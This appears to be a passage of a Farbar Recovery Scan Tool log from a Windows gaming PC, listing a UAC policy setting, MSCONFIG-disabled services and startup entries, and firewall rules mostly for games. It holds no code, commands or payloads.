HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: ALG => 3
MSCONFIG\Services: AppIDSvc => 3
MSCONFIG\Services: AppMgmt => 3
MSCONFIG\Services: aspnet_state => 3
MSCONFIG\Services: AudioEndpointBuilder => 2
MSCONFIG\Services: AudioSrv => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BFE => 2
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: Browser => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CertPropSvc => 3
MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2
MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2
MSCONFIG\Services: COMSysApp => 3
MSCONFIG\Services: CryptSvc => 2
MSCONFIG\Services: CscService => 2
MSCONFIG\Services: defragsvc => 3
MSCONFIG\Services: Dhcp => 2
MSCONFIG\Services: DiagTrack => 2
MSCONFIG\Services: DisplayFusionService => 2
MSCONFIG\Services: Dnscache => 2
MSCONFIG\Services: dot3svc => 3
MSCONFIG\Services: DPS => 2
MSCONFIG\Services: EapHost => 3
MSCONFIG\Services: EFS => 3
MSCONFIG\Services: eventlog => 2
MSCONFIG\Services: EventSystem => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: fdPHost => 3
MSCONFIG\Services: FDResPub => 3
MSCONFIG\Services: FlexNet Licensing Service => 3
MSCONFIG\Services: FontCache => 2
MSCONFIG\Services: FontCache3.0.0.0 => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hamachi2Svc => 2
MSCONFIG\Services: hidserv => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: hkmsvc => 3
MSCONFIG\Services: HnGSteamService => 3
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: IEEtwCollectorService => 3
MSCONFIG\Services: IKEEXT => 2
MSCONFIG\Services: IPBusEnum => 3
MSCONFIG\Services: iphlpsvc => 2
MSCONFIG\Services: KeyIso => 3
MSCONFIG\Services: KtmRm => 3
MSCONFIG\Services: LanmanServer => 2
MSCONFIG\Services: LanmanWorkstation => 2
MSCONFIG\Services: lltdsvc => 3
MSCONFIG\Services: lmhosts => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MMCSS => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: MSDTC => 3
MSCONFIG\Services: MSiSCSI => 3
MSCONFIG\Services: msiserver => 3
MSCONFIG\Services: napagent => 3
MSCONFIG\Services: Netlogon => 3
MSCONFIG\Services: Netman => 3
MSCONFIG\Services: netprofm => 3
MSCONFIG\Services: NlaSvc => 2
MSCONFIG\Services: nsi => 2
MSCONFIG\Services: NvContainerLocalSystem => 2
MSCONFIG\Services: NvContainerNetworkService => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NvTelemetryContainer => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: ose64 => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: p2psvc => 3
MSCONFIG\Services: PcaSvc => 2
MSCONFIG\Services: PeerDistSvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: Power => 2
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: QWAVE => 3
MSCONFIG\Services: RasAuto => 3
MSCONFIG\Services: RasMan => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: RemoteRegistry => 3
MSCONFIG\Services: RpcLocator => 3
MSCONFIG\Services: SamSs => 2
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: SDRSVC => 3
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: SDWSCService => 2
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SENS => 2
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: ShellHWDetection => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SNMPTRAP => 3
MSCONFIG\Services: Spooler => 2
MSCONFIG\Services: sppuinotify => 3
MSCONFIG\Services: SSDPSRV => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stisvc => 2
MSCONFIG\Services: swprv => 3
MSCONFIG\Services: SysMain => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TBS => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\Services: Themes => 2
MSCONFIG\Services: THREADORDER => 3
MSCONFIG\Services: TrkWks => 2
MSCONFIG\Services: TrustedInstaller => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: UI0Detect => 3
MSCONFIG\Services: UmRdpService => 3
MSCONFIG\Services: upnphost => 3
MSCONFIG\Services: UxSms => 2
MSCONFIG\Services: VaultSvc => 3
MSCONFIG\Services: vds => 3
MSCONFIG\Services: VSS => 3
MSCONFIG\Services: W32Time => 3
MSCONFIG\Services: WatAdminSvc => 3
MSCONFIG\Services: wbengine => 3
MSCONFIG\Services: WbioSrvc => 3
MSCONFIG\Services: wcncsvc => 3
MSCONFIG\Services: WcsPlugInService => 3
MSCONFIG\Services: WdiServiceHost => 3
MSCONFIG\Services: WdiSystemHost => 3
MSCONFIG\Services: WebClient => 3
MSCONFIG\Services: Wecsvc => 3
MSCONFIG\Services: wercplsupport => 3
MSCONFIG\Services: WerSvc => 3
MSCONFIG\Services: WinDefend => 3
MSCONFIG\Services: WinHttpAutoProxySvc => 3
MSCONFIG\Services: Winmgmt => 2
MSCONFIG\Services: WinRM => 3
MSCONFIG\Services: Wlansvc => 3
MSCONFIG\Services: wlidsvc => 2
MSCONFIG\Services: wmiApSrv => 3
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\Services: WPDBusEnum => 3
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: wscsvc => 2
MSCONFIG\Services: WSearch => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\Services: wudfsvc => 2
MSCONFIG\Services: WwanSvc => 3
MSCONFIG\startupreg: Actual Multiple Monitors => "C:\Program Files (x86)\Actual Multiple Monitors\ActualMultipleMonitorsCenter.exe"
MSCONFIG\startupreg: AudioSwitcher => "C:\Users\Martin\AppData\Local\Temp\Rar$EXa0.926\AudioSwitcher.exe"
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DisplayFusion => "C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe"
MSCONFIG\startupreg: EVEMon => "C:\Program Files (x86)\EVEMon\EVEMon.exe" -startMinimized
MSCONFIG\startupreg: f.lux => "C:\Users\Martin\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
MSCONFIG\startupreg: HP ENVY 4520 series (NET) => "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5BO3M1CC0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: MSC => "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: ProfilerU => C:\Program Files\SmartTechnology\Software\ProfilerU.exe
MSCONFIG\startupreg: Razer Synapse => "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: RUSH => C:\Program Files (x86)\Fnatic Gear\RUSH\RUSH_Core.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\SmartTechnology\Software\SaiMfd.exe
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: Vivaldi Update Notifier => "C:\Program Files\Vivaldi\Application\update_notifier.exe"
MSCONFIG\startupreg: XboxStat => "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{BCC7BE45-5ACA-4815-B066-515800CB6B4B}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{2E3E76CC-A240-4BC9-B75D-B21DA2449E27}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{4AFEF7FC-5364-4559-B298-316BF152B16B}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [UDP Query User{B9880637-F1BB-4C85-9925-0C3923E020A5}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [TCP Query User{CDDFC1AC-FBDD-43A7-9C65-2D0964B25B74}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{8D82C04F-BF9A-4701-B315-1F3B967766F3}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{627D9905-8B9E-47FF-A117-17E145D698DC}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{5DBF1606-7F85-4C2C-824E-EDFC11BD990D}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{FFDBE546-B8A5-49BE-90B7-42976EBA4237}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E6FA73F3-7E35-4D33-9FE2-82ED8D6F4AFC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8D467693-5B77-4BE8-AE9C-0E9B563FFEAE}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{18C8350D-3057-4C5F-BAD2-725D1C1DECE7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{55EF3563-1C59-42E3-A4F0-9444A74C3E45}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{5C7C4B4A-69D3-483D-8A9C-DED0AC778BCD}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [{45C6EBB6-3B50-46EE-8980-667A09FCEBD8}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{828A5790-20F0-4956-BEB8-5409DF94B749}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{73B9B64C-3636-4CFD-A396-519632DF134D}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{28448C4B-6FAC-45AB-AAF2-7B85D28E66AA}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [TCP Query User{1EC0261B-37E5-4385-B272-9F7BEB055D4F}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{759BC82D-B0DC-4F60-8BF7-9B7C657D9AD8}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [TCP Query User{0EF4E498-8DB1-439E-B6AA-EAB36450D94B}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{D7B1A737-8140-4BF3-A072-18BB4055E961}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{E900344C-C1D2-4B5A-8C5E-A2FA76B69DCF}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{A5CC0085-DDB9-46E6-9D7F-C3D29ADFC80B}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{CE40884C-D69D-4465-979B-BA4B30B9422E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [{266CFBBD-8D67-4C75-979F-4A9A8AB47588}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [TCP Query User{DEF1856C-BB33-44D0-93E7-9412C14515BA}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{54A34DA2-9A0B-4380-A28B-AB3B5CCF882F}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{61949EEE-5F62-40E1-80A6-E35482F3B71D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{0CDB1C6D-EC84-4F79-BE49-01DA29FC333D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{88C5EC1F-9F0C-4BC6-969B-98A5B600471E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{1C04E8C1-5BE1-41A4-A81D-744CA624EC02}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E5B4D7C5-07BE-4454-BF77-0EB6C80047D4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D4211A51-4CEC-4289-B7A1-430D4D240889}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9B851F42-1FC8-41E4-8FEE-20948E6A2EE2}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{977CFC13-A7A2-4185-BC37-56982093CA7C}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{B9F172E7-6FA5-4EC8-A9CA-3F8595D0E566}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{9E83C0FE-4B23-463A-B83E-2EB3EAE5F80F}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{53E8919F-68FF-4BA8-8522-FA2F5301F9D2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0461EBF1-7790-46AD-9455-39076D092A87}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{91EE7751-797C-4734-A64E-422748E809CF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9147620D-AC70-4F7B-9DC6-14750D3EA729}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6D2F2A72-BAF3-4580-ABD1-490BF2F2FD5C}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{35458669-7E78-4505-8146-C2DC82096E56}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{6C0610D3-B27F-4795-BFE9-09046B8D93A4}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [{32B5C767-EA76-4FA6-8B6B-941A767CB7FF}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [TCP Query User{115CC196-11CD-4A9A-848A-6938D2300FEC}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [UDP Query User{31028D38-37E1-4AE1-A4D3-E17A7827C183}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [TCP Query User{D26D34ED-C6DC-4548-8E4A-F9B1D8C9F3D4}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [UDP Query User{3BF9E913-01AA-4CD6-9791-02D20E6E21B3}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [TCP Query User{D194207E-DDFD-4627-A0FC-BE2AEDBF6E7E}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [UDP Query User{F24EFC90-BBE5-41F9-9D0E-E8B90B1940EF}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [{E543B941-B036-4E0B-8C3A-402A4504914E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D6A8053A-49C3-49B7-8F59-73AEE955C61F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FAC44A78-780D-426C-AF18-E1732DB54315}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{C6840C5F-EED4-40C0-B62C-09EA5DDF5C54}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{1AF22D79-FBE2-403D-8EB4-89EC28BFB2D2}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{D1C3AB65-7BCE-4E3F-B7E3-702CE1A76B6F}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{7C9C72EB-F655-4B26-80A3-872C50D6C853}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{CC7899A3-3B5F-4AA2-ADFB-0DFA2664FC0B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{F611C6D4-FBAC-498B-950F-DF8B93E825BB}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{C6B12067-A165-42B4-8493-1427A24499EF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{352241C8-F360-47FD-BB61-A99048135DF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{1F00559E-8678-4CA4-80D8-F4828CDE89AA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{80DCBFFD-115F-4B87-8D59-93ACF03B341D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3294C900-CB00-4E0F-BC69-4821E9831571}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{93986157-C87E-4AFE-96A8-FD7CD0ABD567}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{809F66C2-6701-4313-8B10-7B8BD900866B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{4FC1668A-CB01-4DD7-9DAE-C7F25A440247}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{1E88176E-755C-4681-BBD0-B30DC3F068D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{79792EA2-C9DE-4298-926B-BC90F3195376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{84979D94-0AEB-46C3-969C-9B16766CB14C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{0842EC48-341B-4BE5-8806-F895B1A02DD5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [{5876B581-FA66-4BC7-8A00-35BF03AB8A02}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [TCP Query User{F9D61A2D-DF6B-46D6-A53E-2E436D01180B}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [UDP Query User{70A3BEC4-CD11-4C95-83F5-225D9ED47A26}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [{1B617450-991D-493F-A0A4-83E61FCBBDE4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{92B52AA9-B01C-45B5-92CB-A8217B8519A5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{0966B62F-5434-423E-960F-43C13E70704B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{72CD6C0C-FB9C-4D1F-B641-7BC04AFBBE64}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{A8BDD7FA-BD06-4D31-9129-C0379C81A7DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{C5D12B7B-9A5B-4D13-A3D0-97737CF55F3B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{6F611789-7AF0-4311-A413-5BD1E442E6F2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{7EE7CEF0-CC26-421D-852B-A41EB04AAA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F5C461FF-689E-4533-A67F-75367B56F40C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{E398CD22-4D44-47F8-9C19-9A06B908F24B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [TCP Query User{D6794F86-C0B5-4AEA-AB6B-FA39747E18C8}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [UDP Query User{A6FE6FA7-0813-4DCE-BEF2-5818F72B3519}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [{F489B2AD-61AC-4BD0-9F21-DD536D182F20}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{2BE4269B-F03C-40EA-8C01-4EFE73ADD5A8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [TCP Query User{D4318ABC-EC68-4A88-830A-689E6DD21C84}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [UDP Query User{1456890F-4AA7-4A15-B12A-19A0BB3F99F7}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [TCP Query User{B581FB4E-4169-4D34-B684-8EB647EB97DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{4F52FEA6-04DD-4CC9-BCD4-90E15D3600BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{8CFF32A0-B686-4BDB-A678-E53ED8DD54BD}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [UDP Query User{63D32474-73BA-4E2C-BF1B-530850F77567}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [TCP Query User{5F8388FA-07B6-46FA-A85A-BDC61AEB2896}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [UDP Query User{EAE8ECFA-BA38-4F2A-B311-F74C7B6A09DD}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [TCP Query User{D04B26D3-05BF-4467-96C6-F5EFCEA9A568}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{ECD07AB0-51C7-415D-8B98-F1A1FC702136}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{814455B8-D927-4DF5-B1FE-25FFAB4E2FE7}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [{3FF9881D-DCDE-42EA-B1E9-4D0465089615}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{D599766A-387D-4295-A977-8A7C4CD34D2F}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [UDP Query User{547CD1BA-D1F9-4CA9-B13D-B5840050F926}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{DE6C67B3-404F-4E00-A294-F9A4AFC2C855}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{A388931D-F8A0-43AF-A9EE-3F2F1AB0D802}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{AC075F6A-A440-4B5B-8C6E-20668B72EA5D}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{47E95813-C968-481B-8401-A9F5423D9339}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{F88826EC-C4A7-4998-88F7-040A1DA49F26}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [UDP Query User{472ABE4E-8E97-428A-8634-C1F1221B2FC9}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
